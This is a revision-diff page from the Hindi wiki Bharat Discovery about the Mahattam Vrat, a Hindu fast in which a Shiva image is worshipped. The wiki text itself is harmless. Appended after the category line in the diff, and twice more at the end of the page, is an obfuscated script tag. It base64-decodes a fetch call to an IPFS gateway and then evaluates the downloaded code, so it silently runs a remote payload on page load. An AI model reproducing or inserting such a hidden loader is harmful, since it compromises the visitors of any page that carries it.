Difference between revisions of "महत्तम व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (महत्तमव्रत का नाम बदलकर महत्तम व्रत कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*यह भाद्रपद शुक्ल की तिथि पड़वा को होता है।  
 
*यह भाद्रपद शुक्ल की तिथि पड़वा को होता है।  
 
*इसमें स्वर्ण या रजत की [[शिव]] मूर्ति की पूजा की जाती है।  
 
*इसमें स्वर्ण या रजत की [[शिव]] मूर्ति की पूजा की जाती है।  
*शिव की तीन आँखें, पाँच मुख होते है।
+
*शिव की तीन आँखें, पाँच मुख होते हैं।
 
*मूर्ति को एक घड़े के ऊपर रख कर [[पंचामृत]] से स्नान कराया जाता है।
 
*मूर्ति को एक घड़े के ऊपर रख कर [[पंचामृत]] से स्नान कराया जाता है।
 
*उसके बाद पुष्प आदि से पूजा की जाती है।  
 
*उसके बाद पुष्प आदि से पूजा की जाती है।  
Line 8: Line 8:
 
*महत्तमव्रत में 16 फलों का अर्पण किया जाता है।  
 
*महत्तमव्रत में 16 फलों का अर्पण किया जाता है।  
 
*महत्तम व्रत में अन्त में गौ दान किया जाता है।
 
*महत्तम व्रत में अन्त में गौ दान किया जाता है।
*यह व्रत दीर्घायु, राज्य की प्राप्ति आदि के लिए किया जाता है।<ref>स्मृतिकौस्तुभ (पृ0 201)</ref>
+
*यह व्रत दीर्घायु, राज्य की प्राप्ति आदि के लिए किया जाता है।<ref>स्मृतिकौस्तुभ (पृ0 201</ref>
 
*निर्णयामृत ने भ्रामक ढंग से इसे मौनव्रत कहा है।  
 
*निर्णयामृत ने भ्रामक ढंग से इसे मौनव्रत कहा है।  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 25: Line 19:
 
[[Category:व्रत और उत्सव]]
 
[[Category:व्रत और उत्सव]]
 
[[Category:पर्व_और_त्योहार]]
 
[[Category:पर्व_और_त्योहार]]
[[Category:संस्कृति कोश]]
+
[[Category:संस्कृति कोश]]<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

Latest revision as of 12:56, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah bhadrapad shukl ki tithi p dava ko hota hai.
  • isamean svarn ya rajat ki shiv moorti ki pooja ki jati hai.
  • shiv ki tin aankhean, paanch mukh hote haian.
  • moorti ko ek gh de ke oopar rakh kar panchamrit se snan karaya jata hai.
  • usake bad pushp adi se pooja ki jati hai.
  • is pooja mean karta maun vrat rakhata hai.
  • mahattamavrat mean 16 phaloan ka arpan kiya jata hai.
  • mahattam vrat mean ant mean gau dan kiya jata hai.
  • yah vrat dirghayu, rajy ki prapti adi ke lie kiya jata hai.[1]
  • nirnayamrit ne bhramak dhang se ise maunavrat kaha hai.


tika tippani aur sandarbh

  1. smritikaustubh (pri0 201

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>